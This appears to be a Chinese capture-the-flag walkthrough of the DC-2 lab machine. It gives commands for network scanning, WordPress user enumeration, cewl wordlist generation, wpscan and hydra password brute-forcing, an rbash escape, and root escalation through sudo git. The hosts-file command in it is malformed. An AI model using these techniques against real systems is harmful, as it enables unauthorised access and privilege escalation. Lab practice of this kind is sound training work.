1.信息收集
A.查找ip
方式一:sudo arp-scan -l
方式二:sudo nmap 192.168.221.0/24
方式三:sudo netdiscover -r 192.168.221.0/24(实时)
这里我们使用方式一
得到ip为192.168.221.145
B.全面扫描
Sudo nmap -A -p- 192.168.221.145
发现开启了http和ssh服务这里注意ssh服务的带端口是7744
C.目录爆破
方式一:dirb http://dc-2
方式二:nikto -url http://dc-2
发现了疑似登录的页面
2、
A、登录dc-2
这里发现不能直接登录可能是设置了跳转我们自己在本地dns绑定一下
echo 192.168.221.145 >C:\Windows\System32\drivers\etc
成功登录
看一下flag1
这里提示我们用自己的密码爆破不行
可以试试cewl这个命令
简单的说,cewl (发音:cool)是一个 自定义单词列表生成器,它是一个用ruby编写的应用程序,它会抓取指定的URL,知道指定的深度,并且返回单词列表,然后可以将返回的单词列表放入一些爆破工具中进行密码破解,比如约翰开膛手 (John the Ripper)。 ceWL还可以创建在mailto链接中找到的电子邮件地址列表。 这些电子邮件地址可以作为用户名暴力破解使用
- 登录dc-2/wp-admin
3、爆破密码
A、用wpscan枚举用户名
wpscan --url http://dc-2 -e u
获取到三个用户名写到usr.txt作为字典
B、获取密码字典
根据flag1提示用cewl http://dc-2 字典获取密码字典
C、爆破
wpscan --url dc-2 -U usr.txt -P password.txt
4、登录
A、Jeery
在jerry的pages里发现了flag2
如果您无法利用WordPress并采取捷径,还有另一种方法。
希望你找到了另一个切入点。
B、tom
Tom里什么都没发现我们根据flag2的提示换个思路用hydra爆破一下ssh hydra -L usr.txt -P password.txt -s 7744 192.168.221.145 ssh -vV -o dc-2.ssh
用ssh远程连接
发现了flag3但是cat命令被禁掉了
我们看看还有那些命令可以使用
echo $PATH 查看当前用户的命令解释器路径
尝试绕过rbash
BASH_CMDS[a]=/bin/bash
A
PATH=$PATH:/usr/bin:/usr/sbin:/bin:/sbin
根据flag3的提示我们切换jerry
使用刚刚得到的密码切换到jerry后在jerry的家目录下找到了flag4我们根据 提示看一下应该只剩最后一个root的了
这里发现git不需要密码有root权限
我们就可以用git来提权两种方式
- sudo git help config #在末行命令模式输入
!/bin/bash 或 !'sh' #完成提权
- sudo git -p help
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
